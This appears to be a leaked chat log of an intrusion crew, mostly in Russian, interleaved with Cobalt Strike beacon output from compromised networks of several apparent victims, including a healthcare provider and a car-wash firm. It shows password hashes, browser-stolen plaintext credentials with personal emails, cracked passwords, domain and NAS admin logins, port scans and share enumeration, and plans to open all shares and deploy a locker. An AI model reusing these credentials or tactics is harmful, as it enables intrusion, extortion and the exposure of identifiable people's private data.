2782 order eb3c1b2253c1abf545acb0db00704806 66048
3246 PRH-2663$ 77c3176ef2d7642ddac6d85736be174f 4096
7110 PRH-2993$ 350a7dc227a0ecd4c9ad528885f33223 4096
2881 PRH-2702$ 0a3f399eaa21662e57f0695d5c86398f 4096
3356 PRH-2975$ 1df40826b608198f88479f329b54019f 4096
7123 kmikkelson 4daa86c8f9a4cf8aed1e49513b57a104 66048
3243 PRH-2202$ e4d66e7fb0499f2dff51d72829f0a7b5 4096
6654 PRH-3077$ 8e5c3d07af7cd48e511f551872b6b999 4096
3231 PRH-2119$ 18c1b205ba5c27c68904db362597c5d3 4096
6674 PRH-3131$ 03988e64ab2246df567df22f839d06 4096
3317 PRH-2881$ 20b4ed6e8977599ac239d5cfeb97145c 4096
6692 mwenzel 3a6fbaea894360a3d55b2a21d839a70c 66048
6693 tsyversongrant 3a062933b5976cbff2ab61155bb511b5 512
4639 PRH-3067$ 9ed411ce8029085f69497ccf6a9fe0 4096
7134 PRH-3113$ 73db7c55fea363947cbe6ad5ef5f70e9 4096
3245 PRH-2661$ 328ac1ecc07035afec94cf80163b8c6c 4096
5618 PRH-2678$ c60bf8b519df9b11568b0e7ed28f13f1 4096
3252 PRH-2666$ 870177f36cafe4b0ecaaa13d10dd8355 4096
2854 sdenoble eb3c1b2253c1abf545acb0db00704806 66048
7113 PRH-3076$ 54935d148299e8c40e11c9987b12a96e 4096
3327 PRH-2683$ ffbe9c9af24c640a65681ccddc2de8e9 4096
4629 PRH-2992$ 737e07ed24a35ded2b9691c188e46eac 4096
4615 ewoodke 64f12cddaa88057e06a81b54e73b949b 66048
3042 tracking c39f2beb3d2ec06a62cb887fb391dee0 66048
3242 PRH-2660$ 44caef032b5ced7d2b1d49f7e15e810f 4096
3193 ambulance 74b97c4ce24198d4af22db7910f3ef75 66048
2976 cr 7311df4eac99d671e447bd797ddc8d7f 66048
3259 PRH-2664$ 68846af71a5b1f8995ff99aad561871b 4096
3190 KRIS-PRH-2685$ bacb03d24484cc94f3db1153982ba146 4096
2562 cosborne 581ffce63b88cbab82f6decb9a5eb6a2 66048
3346 PRH-2240$ 50d6f80d816f30e90d2e7cbd1ca3e4af 4096
7605 SPARE-2020$ a2bb2a57c709ea006628818c29dc481d 4096
5614 jennen 5ca241a638da398b2275af36914a1d94 66048
3017 fbackman 2d09850f9d73356e8b229419fa4c8ccb 66048
7128 PRH-3129$ 297208f2af96f7dca6c96087eadb4ba4 4096
7104 PRH2909$ 932ad6e3cc9376702f849f67d1fc6644 4096
2412 jmcnamar 19f8313a6e13e016e7be22cc394be49a 66048
2243 mamundson 54cf67c3581e8f28dac96f5cbff80570 66048
4637 jwulff 63d67b406723fac633524f98d6011302 66048
3357 PRH-2919$ b9a0d8b26f174ac3b12b9a4049ac2ec4 4096
1235 nlarson 64f12cddaa88057e06a81b54e73b949b 66080
2928 acarr f25e966e3cbc04a7c274b71457497d34 66048
5612 tnyreen 64f12cddaa88057e06a81b54e73b949b 66048
1239 SLV 64f12cddaa88057e06a81b54e73b949b 66080
6689 STOCK_LS$ c4517504b54f9ef3501ae2d774d4b679 4096
6633 ldivald 64f12cddaa88057e06a81b54e73b949b 66048
2847 crohloff ff366185621b9430eaa0bdd22c34408a 66048
6690 DIVALD-2020$ c39bb181960387e05f9b8feee7f829af 4096
3261 dlesmeister b488feb87b8744f87650c094779a4cfa 512
2324 smartin 39a6ccd7d6d2babdd11650ca3e4f2e7f 66048
3330 JFS-JOHNFSTOCK$ 306104c9fd5a890eda9b3a777fe7f570 4096
2483 pholmes 9361c8cfcbe72efc56fbfc38bfd3ac34 66048
4664 swilson 2dc9c0e9a9dbf55f0945ce24fb5e7fa5 66048
3173 gwenstrom e2d2aadee156f45baa63e6b6d9e1822a 66048
2200 spl 6f70de922592d49a9fd650eff31d3b34 66048
1223 JKR 48b01180c8576019c6fd63ee4dfb1444 66080
2294 jstock a273e25d41c20e4f5c4db65b47ed7593 66048
2585 sschmall 210b68c4a2a5725bd5197f38eff6911a 66048
3294 aseger 3a79a42a68d85d852cd11c2879b8afc0 66048
2336 aaltamirano 14633fe81d99ada0956694ccef9c77e7 66048
2794 akowalski d513b1530aad3647fc22f56f8deb33ac 66048
6680 PRH-3112$ 10fb6ab39d766ffcaf49880337f2fe94 4096
3315 PRH-2878$ 36ab8132a68234534f69d2fd9799fe7c 4096
6682 PRH-3116$ 460edfc9c6ac035b6f43ba370b0931ce 4096
2772 cpadmin c817d427000071f7e372e9ee4405f0e1 66048
3345 PRH-1250$ 50c37bce23b29221870fe50c65e1b7ff 4096
1209 bmoore 03096f8607f2f99d8e56d9b63965a2cd 66080
2672 tschmidt 0484108954680796ae055f0a1f4389ac 66048
3041 vlee 6017f27b91078de3dadd26256c5e38bf 512
3068 treadmill 7d60508599c6f6eea2e7957f7482782a 66048
2222 mblair 1eadba7d484394d956fae10223c98a51 66048
3092 MAIL$ 51a02ca6c0fffa13df8ac9f6f298838d 4096
3027 canderson 0c05952f0ef5da033b14ec18bc32d4b1 66048
2626 jdahle 64f12cddaa88057e06a81b54e73b949b 66048
2491 jolsen b35fd07bb31f9518dd01b29a8bc67f13 66048
3094 aathey 32e198b25c1bca58629b6282b4b69ac8 66048
6615 thovde 64f12cddaa88057e06a81b54e73b949b 66048
6608 PRH-3008$ 38202670d12d4c3b61f7b42a8dd5c1f7 4096
3066 PRH-3000$ 996a2fdc1c49fc81a6e39c44ab53edc4 4096
7153 mtoso a1bfa9473289b6f10f741d90c0fc0450 512
3318 PRH-2876$ 914627e69b5b63a93f56f2c33bf245c4 4096
3364 ___VMware_Conv_SA___ 7e6680540cba43fd971c160ad4e483d6 66048
7143 DESKTOP-M3CLUMV$ aecc192c549c84e506675e3515bd9872 4096
2137 mwood 679f896c6af8720a9ac9ca7b3fa50d25 66048
2280 kdaly 64f12cddaa88057e06a81b54e73b949b 66048
2836 PRH-2273$ f3a5088e090b552c11e13666165cf1b1 4096
7137 PRH-2790$ 6db68b8974bedd975b742610c00e9e69 4096
2810 PRH-2623$ 35fad9d1f36911e0ebcd46834252e627 4096
6681 PRH-3123$ 5ea86b4846b81644dcfac0537eec0681 4096
3307 PRH-2873$ 0b69c9eff062308d3d3c52403cefa089 4096
2116 PRH-2979$ 72b4fced4bb842a6de5fbc91a8e916fb 4096
4696 AThormodson 99e86640e8059a212fa80d8c99bfa0d2 512
6706 LRH000262$ 41b2e6741584b2f7c92a4768a2b88cde 4096
2228 tha 722dd030aca3a775fe4a3537b412dd2d 66048
1206 chartroom 7ce21f17c0aee7fb9ceba532d0546ad6 66080
2553 nhoffman cb0abaa50a8f3dc4fc24f04548a41389 66048
4657 PRH-3103$ b6bfc4ba92977ca9a9a82e442ab6a157 4096
6617 Lungs d4c31c67a8e1e9c5a901608fc053e86d 66048
5616 bsmith 64f12cddaa88057e06a81b54e73b949b 66048
2515 rlien 2d3bffbe9b944bac2416622293868061 66048
2665 dsperr 30baf37feb6e2f61e0c2ad226b7ec372 66048
4697 mtkerr e20e421380a905858cd7cca7e2334712 66048
3342 sborsgard b3255351d8dfe7cdedf3f552a49146d6 66048
3312 PRH-2874$ ddd0b075c561be1bd6107e1f8089ae48 4096
7108 jthompson cd9537fd09f00f0377c186febc42b3eb 66048
2906 arisbrudt 64f12cddaa88057e06a81b54e73b949b 66048
2326 nolson becedb42ec3c5c7f965255338be4453c 66048
3208 sberg 64f12cddaa88057e06a81b54e73b949b 66048
3096 pgorman 6b8ba5f3aae982855e5551b8c7936d53 66048
7109 rjhoyt e690e3bf09962403b980bb6b81f3df5f 66048
3071 FPSERVER$ 43e376323eadee8b16c7989c8df01359 532480
6699 jtotland 218143d40917d213ef5dd38998ee45e0 66048
2618 ituser ab310ea1a05dc32528c9e5102a26b294 66048
2675 kgerber 14a6939d98f10b267219e6374ef230cd 66048
2880 PRH-2701$ cbb0ca44170500764bbc2b2eef09026b 4096
2669 phaberer 2f7788fa03a3deed9c4b43d6204e8a85 66048
6675 PRH-3125$ dd43b97954bac2493f287d1b19162bc9 4096
3145 WSERVER3-PC$ 136a1889dbbebaf19fe659acf8737767 4096
2281 RMeichsner 64f12cddaa88057e06a81b54e73b949b 66048
5604 ELEAHSERVER$ 2db5eb12f6f902bcf78ff12f643fa6c2 532480
500 Administrator db74c9408655f77f65b01d248fa459df 66048
2666 krogahn 615f178fd1afa75283f4c023c27035af 66048
3319 PRH-2880$ 8839eda0225bac49e0725b472c16822b 4096
4612 PRH-3001$ 1b6812ece2fbe68b993ac64c3cecb0d2 4096
1202 sos bc73e083d3eb8f3d3e098010a1fd8127 66080
1240 SMA 4e426eb9d160988d2a0f2b5bc0473aa1 66080
1201 lab f52d5c82de6ecc8f7d0b1a9d5ff3672f 66080
3119 PRH-1169$ 3e159cd25b9ba4938cd24b272a0685ba 4096
3297 hdomek 64f12cddaa88057e06a81b54e73b949b 66048
2805 snordby 7ce21f17c0aee7fb9ceba532d0546ad6 66048
2464 PRH-1133$ cff5753db280fd3402e9da745252930b 4096
7157 LRHC$ 81b9f3c594d556c0091c8deff7486dc6 2080
2502 PRH-3041$ f65e3cc24bbb1e480f967fcb22ab63d0 4096
2525 jhotvedt c98a8b1efa7a564c9247411ecfe8d8c0 66048
6668 mruegemer 115694b78a8411438f5a092847b30ebe 512
2907 PRH-2955$ 7d2fde70f0b1c3aa7729bcb564269e57 4096
4687 val 812792a1f13bb10964ed1dfeac78c64b 66048
7129 PRH-2213$ 1a34202f6f4759977ed502055043245a 4096
3045 tbuseth 1a60a6e3a4db305a9cbc8fc4522eed2d 66048
4670 PRH-3127$ 393a0c622108d8e097268fa00b79dc30 4096
3176 ELEAHBDC$ f5edff92ccf8406f26597614a5b458ba 532480
2604 SHAREPOINT$ b994bf3a81af1e80dbc57e9b3c8c5958 4096
2311 ELBOW-102$ 7cc5cfe0d26a2c709058399aa1ee070c 4096
5607 PRH-3005$ cfbd8ef7643f720e4fb0e90e88f471e0 4096
``под соксомсюда попробуйте``
autodiscover.lrhc.org 52.97.141.88 Sign in to Outlook
``````
m.lrhc.org 40.112.142.148 Windows Microsoft-IIS 10.0 Microsoft Azure Web App - Error 404
lrhc.org 52.41.140.55 Lake Region Healthcare | Lake Region Healthcare
autodiscover.lrhc.org 52.97.141.88 Sign in to Outlook
sip.lrhc.org 52.112.192.139 RTC 7.0
smtp.lrhc.org 66.228.239.132
mail.lrhc.org 66.228.239.133
ftp.lrhc.org 66.228.239.137
support.lrhc.org 66.228.239.151 Apache-Coyote 1.1 Web Help Desk
patch.lrhc.org 66.228.239.157
``````

``его домен креды не катяту него сохранен вход)пробую под нельсоном зайтида пока никакпо почте как дела обстоят?теперь успокоился)``
beacon> ls C:\Users\cmelliott\AppData\Local\Microsoft\Edge
[Tasked beacon to list files in C:\Users\cmelliott\AppData\Local\Microsoft\Edge
[+] host called home, sent: 77 bytes
[*] Listing: C:\Users\cmelliott\AppData\Local\Microsoft\Edge\

 Size Type Last Modified Name
 ---- ---- ------------- ----
```дайте листинг папки ежа)он хромом пользуетсянебылоя хз чем его сниматьтак у него не было ежа или был?``
10.10.220.45:445 (platform: 500 version: 5.1 name: PAULSANDERSON domain: FFMG)
```а не в каталоге браузераон ищет в vault[ ](https://mediaeveryone.com/group/lrhc-org?msg=STFrsGWwCj4KENyy6) шарп веб по моему устарел для ежаснайпермэйл не сработал?мож пароль совпадет, похоже перебирать придетсявряд ли разраб имет доступ в бэкапыэто тачка разраба какого-то`http://pdiprodweb/FocalPoint/Login.aspx`
тут у нас что?
--- Chromium Credential (User: gkeller) ---
URL : https://designcloud.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

--- Chromium Credential (User: gkeller) ---
URL : https://login.microsoftonline.com/common/login
Username : gkeller@waterway.com
Password : W

--- Chromium Credential (User: gkeller) ---
URL : https://id.atlassian.com/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : http://pdiprodweb/FocalPoint/Login.aspx
Username : waterway\gkeller
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://github.com/session
Username : gkellerww
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://smartscan.controlscan.com/security/login
Username : 65000001503764
Password : u7i2jwPWZdfCwcU

--- Chromium Credential (User: gkeller) ---
URL : https://waterway.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://waterway1578930554.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

```хотите хостнеймы - прописывайте локально в файле hosts имена ипне резолвит сокс хостнеймыопять?хотя вряд ли там есть бэкапсистема``
URL : https://system.netsuite.com/
```агаlol)```
URL : http://wwsql01/
Username : sa
Password : sa

``````
[*] Beginning Google Chrome extraction.


[+] received output:
--- Chromium Credential (User: mapusatera) ---
URL: https://auth.monday.com/users/invitation/accept
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://waterwaycarwash.monday.com/users/sign_in
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://www.cnn.com/account/register
Username : 63367
Password : Wf$.tP-sF2Z4pF*

--- Chromium Credential (User: mapusatera) ---
URL : https://aim.luminatehealth.com/login
Username : michaelpusatera@gmail.com
Password : kUVkch.4M.YBR9X

--- Chromium Credential (User: mapusatera) ---
URL :
Username : michaelpusatera@gmail.com
Password : 715Drew

--- Chromium Credential (User: mapusatera) ---
URL : https://www.hollisterco.com/shop/OrderItemDisplayView
Username :
Password : N-nC2c*bTB_C-v-

--- Chromium Credential (User: mapusatera) ---
URL : https://shop.lululemon.com/shop/checkout/confirmation
Username : amybrinkman13@gmail.com
Password : fws5z&mQtf5WUVH

--- Chromium Credential (User: mapusatera) ---
URL : https://www.ae.com/us/en/cart
Username : morganpusatera@icloud.com
Password : ILOVEDANCE123

[*] Finished Google Chrome extraction.

[*] Beginning Edge extraction.

--- Chromium Credential (User: mapusatera) ---
URL : https://system.netsuite.com/
Username : mpusatera@sotelsystems.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : transact@waterway.com
Password : $tqMy2K5%T#r

--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : map@waterway.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : sa
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : map@waterway.com
Password : %0%f#rC!5vJj

--- Chromium Credential (User: mapusatera) ---
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : waterway\administrator
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://signin.quicken.com/
Username : michaelpusatera@gmail.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://www.waterway.com/
Username : michaelpusatera@gmail.com
Password : fgSrBr%2#cJx

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : michaelpusatera@gmail.com
Password : Richie42

[*] Finished Edge extraction.

[Done.

``````

User: mapusatera - IP Address: 192.168.0.164
User: DBunte - IP Address: 192.168.90.2
User: gkeller - IP Address: 192.168.0.162
User: Quser - IP Address: 192.168.13.57

``````
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1

````https://mail.datotel.com/owa/`customercare@waterway.com Wc#2020!``http://192.168.0.10:3000`http://192.168.0.9:3000/auth/login?redirect=%2F`вы кстати нашли чего вне домена?мб снайпермэйл попробуй в почту зайти https://192.168.0.115/-нимблв набл залезли?``
BACKUPDVR.waterway.com
 
192.168.0.46:443
192.168.0.46:80
``надо убедиться что все нашлитут пока без движения?``
beacon> portscan 192.168.0.119 1-10000 icmp 1024
[*] Tasked beacon to scan ports 1-10000 on 192.168.0.119
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``мб реплика откл поэтому 100% лосс анричбл смысла нетвот надо сканить с тех которые лосс на портыс некоторых 100% лоссмоя не внимательность (он с некоторы компов анричаблон `Destination host unreachable`так а в чем прикол то*``
Pinging BACKUP.waterway.com [192.168.0.119] with 32 bytes of data:
Reply from 192.168.0.192: Destination host unreachable.

Ping statistics for 192.168.0.119:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:08:09> portscan 192.168.0.119 1-10000
``````
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:05:54> portscan BACKUP 1-10000 icmp 1024
[Tasked beacon to scan ports 1-10000 on BACKUP
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:06:18> shell ping BACKUP -n 1
[*] Tasked beacon to run: ping BACKUP -n 1
[+] host called home, sent: 47 bytes
[+] received output:

Pinging BACKUP.waterway.com [192.168.0.119] with 32 bytes of data:
Reply from 192.168.0.192: Destination host unreachable.

Ping statistics for 192.168.0.119:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:08:09> portscan 192.168.0.119 1-10000 icmp 1024
[Tasked beacon to scan ports 1-10000 on 192.168.0.119
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``````
datavault Waterway727
domainrestore Waterway727
mapusatera Gators1853
Administrator 1853Gators
veeam_admin 99Waterway
Applied Waterway99
DBunte Waterway99
gkeller Waterway76
SEnglert Waterway99!
``````
594d1d0f2355dbd18bab80250cd9a1c4 Waterway727
594d1d0f2355dbd18bab80250cd9a1c4 Waterway727
c9f45ab5e6cc7b11dcf9b3bce3fa64df Gators1853
ee54eb9485bf78494a7074cb7b0513a0 1853Gators
a313f6cf5fb92a96195435f9a6e4b5a9 99Waterway
debd2d79f79e305817da0ec58509d686 Waterway99
debd2d79f79e305817da0ec58509d686 Waterway99
134cee9671bb94bffdaefb6f84f5989d Waterway76
036c9df1839c6adc5e65c74fffdca10b Waterway99!

``можно вот хэшики пожалуйста?
```
datavault 594d1d0f2355dbd18bab80250cd9a1c4
domainrestore 594d1d0f2355dbd18bab80250cd9a1c4
mapusatera c9f45ab5e6cc7b11dcf9b3bce3fa64df
Administrator ee54eb9485bf78494a7074cb7b0513a0
veeam_admin a313f6cf5fb92a96195435f9a6e4b5a9
Applied debd2d79f79e305817da0ec58509d686
DBunte debd2d79f79e305817da0ec58509d686
gkeller 134cee9671bb94bffdaefb6f84f5989d
SEnglert 036c9df1839c6adc5e65c74fffdca10b
``root Waterway99!
насик с бэкапами:
    192.168.0.3 Waterway 11915Wnas2179!
```
```
DA:
    WATERWAY\Quser pdiC1137qu!
    WATERWAY\Administrator 1853Gators
```да, подождите...) мож еще по людски из линуха потрем))угу так же поступимктрл+а > делитвот мы там тожепотерем тогда окейя думал это внутри))внизу навбар от твоего дедикааану слушай я хз как на этой байде админ-лист глянуть``
https://192.168.0.42
https://192.168.0.43
https://192.168.0.75
https://192.168.0.77
``я смб_логином проходил+на запись прав не было да?туда все проходили как пользаки толькодаже шары не давал посмотретьа чекни латам не получалосьу нас вилсонарте точно такой же былне смогли по нему прятинуть?естьtcnmу него 445 закрыт?отличноагакак на 3 картинкеа в папочках вот такие файликикак на 2 картинкеа в нем вот такие папочкинасикэто вы в бэкап залезли?`192.168.0.3\.\Waterway 11915Wnas2179!`а пробить пытались?и скультелнет открыт``
198.61.195.78:5948
198.61.195.78:1433
198.61.195.78:21 (220 Microsoft FTP Service)
```с этого бы надо начать)сейчас крч отсканю портытуда рдп порта не было? или 445``
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 23:32:52> shell ping raxdb.waterway.com -n 1
[*] Tasked beacon to run: ping raxdb.waterway.com -n 1
[+] host called home, sent: 59 bytes
[+] received output:

Pinging raxdb.waterway.com [198.61.195.78] with 32 bytes of data:
Reply from 198.61.195.78: bytes=32 time=19ms TTL=114

Ping statistics for 198.61.195.78:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms

```не, почему же?внешняя админка?я пытаюсь подбирать пароли с браузеров и с мимикау технарей пусто?подбираю пароль под НАС что ТЛ2 подкинултак тут у нас?``
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:59:37> shell net view \\CLEBACKUP2020 /all
[*] Tasked beacon to run: net view \\CLEBACKUP2020 /all
[+] host called home, sent: 60 bytes
[+] received output:
System error 5 has occurred.

Access is denied.

``````
Teemo[PDIPRODWEB]SYSTEM */728|20Dec27 21:54:41> shell net view \\MWEISSDESKTOP /all
[Tasked beacon to run: net view \\MWEISSDESKTOP /all
[+] host called home, sent: 60 bytes
[+] received output:
Shared resources at \\MWEISSDESKTOP



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
Brother HL-5450DN series Print
C$ Disk Default share
IPC$ IPC Remote
print$ Disk Printer Drivers
The command completed successfully.


Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:55:01> shell net view \\U20OFFICENEW /all
[*] Tasked beacon to run: net view \\U20OFFICENEW /all
[+] host called home, sent: 59 bytes
[+] received output:
Shared resources at \\U20OFFICENEW



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C$ Disk Default share
E$ Disk Default share
IPC$ IPC Remote IPC
The command completed successfully.


Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:55:42> shell net view \\DVRNEWBACKUP20 /all
[*] Tasked beacon to run: net view \\DVRNEWBACKUP20 /all
[+] host called home, sent: 61 bytes
[+] received output:
Shared resources at \\DVRNEWBACKUP20



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote
The command completed successfully.


Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:56:09> shell net view \\KCNEWBACKUP2020 /all
[*] Tasked beacon to run: net view \\KCNEWBACKUP2020 /all
[+] host called home, sent: 62 bytes
[+] received output:
Shared resources at \\KCNEWBACKUP2020



Share name Type Used as Comment

-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C Disk
C$ Disk Z: Default share
IPC$ IPC Remote IPC
The command completed successfully.


Teemo[PDIPRODWEB]SYSTEM */728|20Dec27 21:56:34> shell net view \\WATERWAY43OFFIC /all
[Tasked beacon to run: net view \\WATERWAY43OFFIC /all
[+] host called home, sent: 62 bytes
[+] received output:
System error 53 has occurred.

The network path was not found
``````
http://192.168.0.3:5000 - NAS

NAS (nimble storage)
логин\пас Administrator\1853Gators
https://192.168.0.42:443
https://192.168.0.43:443
https://192.168.0.75:443
https://192.168.0.77:443

\\192.168.0.164 - осмотреть тачку на предмет важной инфы

неизвестные юникс сервера (есхи?)
192.168.0.10:22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1)
192.168.0.9:22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1)
``````
192.168.0.159:445 (platform: 500 version: 6.1 name: MWEISSDESKTOP domain: WATERWAY)
192.168.20.2:445 (platform: 500 version: 10.0 name: U20OFFICENEW domain: WATERWAY)
192.168.42.2:445 (platform: 500 version: 10.0 name: DVRNEWBACKUP20 domain: WATERWAY)
192.168.30.2:445 (platform: 500 version: 10.0 name: KCNEWBACKUP2020 domain: WATERWAY)
192.168.43.2:445 (platform: 500 version: 10.0 name: WATERWAY43OFFIC domain: WATERWAY)
```user9user8user4по сути все тачки что я вижу (те что а АД) могу к ним законектиться или притянуть, но такое чувство что то упускаю или не в том напровлении ищуесли брать полностью то я
не нашёл сферу (хочть что нибудь куда я смогу подключиться)
не нашёл как отключить АВ
и не нашёл облачные бэкапы (stalin сказал что у них они облачные, что такое он упоминал)а в чем затык?это пользаки Hyper-V`WATERWAY\blauer 11915Admin2179!` только его клеры нашёл``
mapusatera
Applied
djarden
blauer
```
проверял этих пользаковтут у нас что?спалили значитдо этого кмд запускалсяа как у тебя до этого тпш работала?окейвыдам заменудавай скиптнеэтот стоит пробовать?``
Fix 3. Stop the process of the related .dll
```да его и нету дажемб его отключить просто?таскну типа самое безобидное и выбралкоторая и так в говноглавное не похерь им систему)хм``
Press Win + R on your keyboard
Type in taskschd.msc and press Enter
In the Task Scheduler click on Task Scheduler Library once
Right-click on the BackgroundContainer task and select Delete
```ну там fix2какой?думаю второй вариант попробоватьhttps://ugetfix.com/ask/how-to-fix-the-specified-module-could-not-be-found-error-on-windows/при запуске хрома даже эта ошибка лезетахахклучше с ехеили без ехечерез ран же писать нужно rundll32.exe?угукwin r > rundll32 ...я тебе соберу ехе и длл, начни с длла мб через ран запустить рандл?давай шелкод я соберуче мне самому собрать или ты через крутой криптор?+не забудь только качать через инкогнито и т дно давай попробуемехе нагрузка грязнее будетхотя и смысл, если шелы не работают...и по ссылке через хром качнуть по рдпзахостить ее для загрузки в кобеможет exe нагрузку в кобу попробовать?причём temp.dll там лежит[ ](https://mediaeveryone.com/group/healthcare-com?msg=rQzLkTcw6J6FGXwuD) и с этим такжекогда вставляю нагрузку тпш в ран - та же ошибкаили win r > cmd /c echo 123 > C:\file.namewin r > нагрузка тпшпопробуй не запускать гуишный вариантwin r > cmd
win r > powershellа как ты его используешь?через ран точно такжетак тоже должно найтиможешь в поиске написать runокейща перебинд сделаюу меня на win R поверх рдп вылазит этооткроется меню runпопробуй win+rпробовал просто по ярлыку из пуска, созданием ярлыкак запускаешь?при запуске повершелла то же самоепри запуске кмд по рдпСессий так и нет ?как там сессиями?@tl2 может ты че скажешь?@tl1 Есть хорошие новости?еще не знаю@tl1 Сессии будут?нашумели скорее всегои не видно домен...
```
beacon> shell net user nddevbernst /dom
[*] Tasked beacon to run: net user nddevbernst /dom
[+] host called home, sent: 56 bytes
[+] received output:
The request will be processed at a domain controller for domain jdossn.local.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.

``сегодня почти все компы оффрелей тоже ничего далпривет
веб сервисов не нашли, скуля тоже не видно
пустили релей и пошли домой)птhiчто по итогу вчера сделали?всем приветлибо ан логин либо на ремув экшн``
странно конечно что она внутри сети но с 2фа
```
стандартная практика всех ЕДР систем, форсом 2фа по умолчаниюна мыло?а 2фа куда?странно конечно что она внутри сети но с 2фамне помнится 2фамелькала кажисьа админка от кассеи найдена вроде да?админка не найдена7билд потрет 100%нет, у нас тут касея которая никак нас не реагируету вас тут с ав проблемы да?ага, оригинал был https://github.com/djhohnstein/SharpSharesсами накатали софт что ли?да нету еще гита, тестим покаможно ориг название или ссылку на гити потоков сколько скажешьесть такой, шарпшарснг может запускать батник на каждый отработаный хоста это реально быстро будет? сеть достаточно жирная, псек не быстро работает, тут бы какой нибудь мультри тред тул?на все буквы англ алфтогда батч который шарит диск с меткой на буквы метки + $)))но твой вариант мне нравится большеда с моей точки зрения так просто правильнее поступатьв батчеа зачем?а я думал ты цикл по доступным дискам замутил)чтобы не отбираьт "где какой "там просто прописаны все возможные логические дискине имется
я не сохранял ибо он очень тупойпсекзеком по всему домену?)а на этот вопрос я даже отвечать не буду)батник имется?но если дополнительно расшарить исключен вариант проебать что в процесевцелом это тоже самоемапим мы их для приоритетностилокер работает в сетизачем?так их потом все равно мапить на метку надо?на абсолютный доступрасшарить ВСЕ диски на ВСЕХ пкне совсемулавливаете?это когда раскидываем по ВСЕМ серверам батник который открывает ВСЕМ все шарыкоторая покрытие повышает нихуево и скоростькстати
есть еще одна классная штукада
давайте попробуемчтобы повысить процент закрытой "площади" по сети;)предварительно включить все пк в сетиWake On Lanнеа, к @tl2что за вол?это к нам вопрос?кстати эту сеть будем прибивать с WOL?лезут на свет ага[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=7cqrQukLANZFKucaJ) боже, они размножаются
бегитену после пинга через SharpSharesNG их стало больше)пранк серверамиэто пранк)71 сервак из 53 жив?)это как?``
53 сервера (71 живой)
``````
WEB4: 89.0.0.158
WEB4: 89.0.0.157
WEB4: 89.0.0.156
WEB4: 89.0.0.155
WEB4: 89.0.0.154
WEB4: 89.0.0.153
WEB4: 89.0.0.152
WEB4: 89.0.0.151
WEB4: 89.0.0.150
WEB4: 89.0.0.66
WEB4: 65.162.42.254
WEB4: 65.162.42.252
WEB4: 65.162.42.251
WEB4: 65.162.42.250
WEB4: 65.162.42.242
WEB4: 65.162.42.197
``````
winona.rtpco.local

118 тачек по ад
64 армов на винде (10 живых)
53 сервера (71 живой)
```сейчас все перепенгую по новойчто у нас тут перед закрытием?*иа забиливсе
забыли про него@tl2 вроде это рудимент[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=FMtieCLZo3Sm43oj4) воттот вышеэто другойнеее`RichmondDC2.us.alloypolymers.com````
beacon> shell dnscmd us.alloypolymers.com /info
[*] Tasked beacon to run: dnscmd us.alloypolymers.com /info
[+] host called home, sent: 64 bytes
[+] received output:

Query result:

Server info
	server name = RichmondDC2.us.alloypolymers.com
	version = 25800306 (6.3 build 9600)
	DS container = cn=MicrosoftDNS,cn=System,DC=us,DC=alloypolymers,DC=com
	forest name = us.alloypolymers.com
	domain name = us.alloypolymers.com
	builtin forest partition = ForestDnsZones.us.alloypolymers.com
	builtin domain partition = DomainDnsZones.us.alloypolymers.com
	read only DC = 0
	last scavenge cycle = not since restart (0)
  Configuration:
	dwLogLevel = 000000
	dwDebugLevel = 00000000
	dwRpcProtocol = 00000005
	dwNameCheckFlag = 00000002
